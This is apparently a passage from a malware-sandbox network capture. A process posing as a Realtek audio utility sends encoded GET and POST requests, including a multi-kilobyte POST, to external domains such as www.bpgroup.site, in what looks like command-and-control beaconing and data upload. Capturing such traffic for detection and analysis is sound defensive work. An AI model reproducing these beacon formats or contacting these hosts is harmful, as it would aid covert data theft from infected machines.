                                                                                                                                                                              Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a
                                                                                                                                                                              Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8
                                                                                                                                                                              Jan 11, 2025 03:58:01.255745888 CET21INData Raw: 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: b*0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              40192.168.11.2049798172.67.167.146806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:58:03.429758072 CET492OUTGET /8gp4/?iS=FEeZWlhMd48ysDs1jEeP275omfikUvcs8a8x1+EEc0Vq+hoQB7y77Hco5oow9pdvGKqyyoz5OAo+pUm014OHBVCBJUJYyAljBpTR8DkbNSdXd83JJSpVoa4=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.rgenerousrs.store
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:58:03.907243967 CET1119INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:58:03 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aqgDnMzs9OnlAHmrb5WCA5mWLsp71xH3PAJfA3hPgJIWSHsd%2FVwfvpOjeXvD0SlUJ%2FT7VS%2FHi93dfWlav%2BFfjMLqM%2B9PPF5UzWrIMymJ3neMCo4p9cGS9MqnFnlvIpNEUl%2B5K6zLDsA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9001a493d9ef6176-ORD
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=118481&min_rtt=118481&rtt_var=59240&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=492&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                              Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>
                                                                                                                                                                              Jan 11, 2025 03:58:03.907347918 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              41192.168.11.204979974.48.143.82806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:58:09.351660967 CET755OUTPOST /cpit/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bpgroup.site
                                                                                                                                                                              Origin: http://www.bpgroup.site
                                                                                                                                                                              Referer: http://www.bpgroup.site/cpit/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 68 6f 44 69 42 73 6d 75 6c 79 2f 2f 6b 61 45 4e 51 6a 6e 64 61 65 55 6d 6f 65 63 42 66 71 64 74 77 47 72 74 59 68 70 35 79 33 45 5a 78 48 77 64 4a 52 53 62 30 6b 50 61 77 4e 72 38 65 65 47 48 67 55 49 39 31 4a 58 6f 33 6b 5a 6e 32 48 35 36 6c 42 69 75 38 4e 32 48 76 4a 64 4c 37 6a 78 50 55 66 31 35 34 67 46 43 57 2b 70 57 43 37 30 38 6e 33 71 58 51 63 61 45 39 49 49 73 2f 65 4b 69 54 78 50 61 49 33 2f 42 74 6d 76 30 65 4a 4f 36 6a 5a 34 58 58 34 33 62 4c 32 6c 5a 57 77 39 68 45 49 74 41 43 48 5a 37 59 50 74 36 64 43 4e 4c 44 6c 6f 41 36 76 64 62 46 41 63 6a 41 78 75 6e 30 41 3d 3d
                                                                                                                                                                              Data Ascii: iS=hoDiBsmuly//kaENQjndaeUmoecBfqdtwGrtYhp5y3EZxHwdJRSb0kPawNr8eeGHgUI91JXo3kZn2H56lBiu8N2HvJdL7jxPUf154gFCW+pWC708n3qXQcaE9IIs/eKiTxPaI3/Btmv0eJO6jZ4XX43bL2lZWw9hEItACHZ7YPt6dCNLDloA6vdbFAcjAxun0A==
                                                                                                                                                                              Jan 11, 2025 03:58:09.523541927 CET1289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 1251
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:58:09 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:58:09.523552895 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                                                                                                                              Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              42192.168.11.204980074.48.143.82806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:58:12.044322968 CET775OUTPOST /cpit/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bpgroup.site
                                                                                                                                                                              Origin: http://www.bpgroup.site
                                                                                                                                                                              Referer: http://www.bpgroup.site/cpit/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 68 6f 44 69 42 73 6d 75 6c 79 2f 2f 6e 36 55 4e 58 45 7a 64 63 2b 55 6c 6e 2b 63 42 57 4b 64 70 77 47 6e 74 59 6b 4e 54 79 68 73 5a 78 69 4d 64 54 51 53 62 33 6b 50 61 34 74 72 39 44 4f 48 46 67 55 55 50 31 4c 7a 6f 33 6b 4e 6e 32 47 4a 36 6c 32 57 78 38 64 32 46 78 70 64 46 31 44 78 50 55 66 31 35 34 6b 6c 6b 57 2b 42 57 43 71 6b 38 6e 57 71 49 4f 73 61 46 77 59 49 73 31 2b 4b 2b 54 78 50 30 49 32 6a 2f 74 6c 58 30 65 4d 79 36 6a 4d 55 57 59 34 33 64 46 57 6b 52 65 68 67 75 42 38 6c 43 52 6b 68 69 51 66 74 45 56 30 41 52 65 58 63 6b 35 38 42 70 42 77 6c 4c 43 7a 76 38 70 4d 2f 41 31 72 33 63 41 64 39 72 34 45 34 55 77 6c 64 66 61 4d 63 3d
                                                                                                                                                                              Data Ascii: iS=hoDiBsmuly//n6UNXEzdc+Uln+cBWKdpwGntYkNTyhsZxiMdTQSb3kPa4tr9DOHFgUUP1Lzo3kNn2GJ6l2Wx8d2FxpdF1DxPUf154klkW+BWCqk8nWqIOsaFwYIs1+K+TxP0I2j/tlX0eMy6jMUWY43dFWkRehguB8lCRkhiQftEV0AReXck58BpBwlLCzv8pM/A1r3cAd9r4E4UwldfaMc=
                                                                                                                                                                              Jan 11, 2025 03:58:12.216336012 CET1289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 1251
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:58:12 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:58:12.216372967 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                                                                                                                              Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              43192.168.11.204980174.48.143.82806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:58:14.746936083 CET2578OUTPOST /cpit/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bpgroup.site
                                                                                                                                                                              Origin: http://www.bpgroup.site
                                                                                                                                                                              Referer: http://www.bpgroup.site/cpit/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 68 6f 44 69 42 73 6d 75 6c 79 2f 2f 6e 36 55 4e 58 45 7a 64 63 2b 55 6c 6e 2b 63 42 57 4b 64 70 77 47 6e 74 59 6b 4e 54 79 68 55 5a 77 51 30 64 4a 7a 36 62 32 6b 50 61 35 74 72 34 44 4f 48 45 67 55 4d 4c 31 4c 4f 54 33 6e 31 6e 6e 55 42 36 79 79 4b 78 70 74 32 46 35 4a 64 45 37 6a 78 61 55 66 6c 39 34 67 42 6b 57 2b 42 57 43 70 73 38 7a 58 71 49 4d 73 61 45 39 49 4a 74 2f 65 4b 43 54 78 6e 43 49 32 6d 45 73 56 33 30 65 6f 75 36 75 61 67 57 56 34 33 66 56 47 6b 67 65 68 74 75 42 38 51 7a 52 6c 56 63 51 65 6c 45 52 53 4a 47 47 57 77 5a 6e 76 4e 43 4e 77 51 7a 47 52 6a 72 70 75 6a 33 31 39 76 62 44 6f 6c 47 39 33 30 62 73 33 64 6a 47 72 4b 33 58 6a 67 53 61 53 4c 64 43 78 76 75 34 79 46 69 63 46 55 71 67 67 73 76 34 63 33 39 6f 31 4d 70 6d 66 37 4e 42 2b 58 74 70 6e 37 30 6b 70 49 72 33 30 6a 31 6f 75 6d 38 38 52 76 57 32 53 59 43 62 36 71 4f 2f 39 73 33 4a 79 6f 62 44 43 58 6a 4d 5a 59 78 66 57 71 57 49 48 71 51 43 47 56 58 4f 66 43 46 65 37 31 39 45 69 77 42 31 42 57 65 35 46 78 70 38 61 48 [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=hoDiBsmuly//n6UNXEzdc+Uln+cBWKdpwGntYkNTyhUZwQ0dJz6b2kPa5tr4DOHEgUML1LOT3n1nnUB6yyKxpt2F5JdE7jxaUfl94gBkW+BWCps8zXqIMsaE9IJt/eKCTxnCI2mEsV30eou6uagWV43fVGkgehtuB8QzRlVcQelERSJGGWwZnvNCNwQzGRjrpuj319vbDolG930bs3djGrK3XjgSaSLdCxvu4yFicFUqggsv4c39o1Mpmf7NB+Xtpn70kpIr30j1oum88RvW2SYCb6qO/9s3JyobDCXjMZYxfWqWIHqQCGVXOfCFe719EiwB1BWe5Fxp8aHQnUUpfyGsU5wlJCa/xjTgoZvtP8cZ9Zf0mxA9/m7AfbZHLcBR3AnWocJwV/sLVqUaqTTcO44yrQrUjr6thBrWRJ3OxSXTYdQXA0gQqG5qToqBxGXZ9UxjcI6zK13/NW9MXWEcA0fj6XnW2NsJdbfbq45wQKpNyimGSnqdfaiv79LgoYDQvR5CgunDTWzTF5nwrtrrbFL8Qcb8WKzbNA82wGK4LAoU6jk3d3SmC8/f03JjxLcIHnaYg6cf46qkUZ6+2/uVJFtJkieXXOTXAcHiiJhYLFoGNEXQ6P3t6t+9d6qNBei2bOvbKxN4NHn6UYikWYtOGLEk/OTCM2Qj9E/x+eT1V1z3KBh+y/ZNl7GRxMvhIh0FEjntGgEFbsVw31dHxW8hvwT5qRCfHlcGNZDkPpt7a+tC153nYCa3/UlXHTkbEZd5f5D+8Hk/leFjji3KMdDNOtz28Lkw1I124pEbiB2Z/TBi4K7wSgCft9mzK1QR2khdKgJHDUhPCNYreeuueGhNK5UH2BHDVk7F2pf3lU2NTt/K5JdhQlsGM5Wde4P+ROXbeWOQUIM/IEewZY8GTdK01J7Qa6Je9F8lM64dHcT38CRKQcPHgIbhdf2yHDeyfjBWdzEfMyUWc0HMDo1BnP/0BT6Yht11nef6yaTQA/FlJ+21k4YHc [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:58:14.746969938 CET5156OUTData Raw: 75 51 53 2b 54 53 78 70 34 73 56 63 66 73 59 69 4f 54 51 5a 30 42 67 46 73 73 64 4a 77 75 7a 69 65 6c 65 58 2f 36 55 34 63 70 32 77 4c 68 2b 4b 54 67 5a 79 69 41 57 2b 67 47 43 64 76 6b 61 50 37 4f 4c 52 49 66 44 66 4e 4f 6d 57 46 4a 54 72 34 6a
                                                                                                                                                                              Data Ascii: uQS+TSxp4sVcfsYiOTQZ0BgFssdJwuzieleX/6U4cp2wLh+KTgZyiAW+gGCdvkaP7OLRIfDfNOmWFJTr4j4aFvxDA1B5CA2oQaS5PATBtuNqXouaVtjCggK6kU51MilULs8QLf3MPnAQXuNalK9JNZ+SukfceCVFEn7sAxPeIeSKg3WJYyO+0PXCeA2ZYaBvBBfMPUXqpQKz0cAKhBki0bMhlkjwqXmoQHvYKFnGP+dkamJyZ+9
                                                                                                                                                                              Jan 11, 2025 03:58:14.747036934 CET190OUTData Raw: 78 6e 2f 6f 57 79 73 65 70 4a 66 32 59 47 39 7a 61 74 36 77 73 4c 70 57 5a 36 37 61 5a 43 37 67 62 31 61 5a 47 47 6f 79 49 45 74 61 44 42 6c 50 2f 73 6b 57 66 54 49 36 32 54 68 51 39 52 45 4d 63 67 59 4b 47 67 52 6f 73 32 65 42 78 34 69 2f 6d 6e
                                                                                                                                                                              Data Ascii: xn/oWysepJf2YG9zat6wsLpWZ67aZC7gb1aZGGoyIEtaDBlP/skWfTI62ThQ9REMcgYKGgRos2eBx4i/mnPK7c8dBtHsS5X48r+uT7IZyDfd+ycZuq9ZwSnEnvj2krgxosKplboYePpju6sHM0I7+9SZiN+qtkU8zl8F8LRBwZojhR2onAc//TMRjhBw==
                                                                                                                                                                              Jan 11, 2025 03:58:14.918975115 CET1289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 1251
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:58:15 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:58:14.918992043 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                                                                                                                              Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              44192.168.11.204980274.48.143.82806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:58:17.448467016 CET487OUTGET /cpit/?iS=sqrCCcTnmzrg1P4sAk/QU75pr5UiXpEX3HrYYQRUrHENwAM+UA+gtHvn9s/6e57/pGZInJKN/XxZ2ntAsziA3/X4179OogJSAfxe5UAmetVNY4oSlmiuZpQ=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bpgroup.site
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:58:17.620135069 CET1289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 1251
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:58:17 GMT
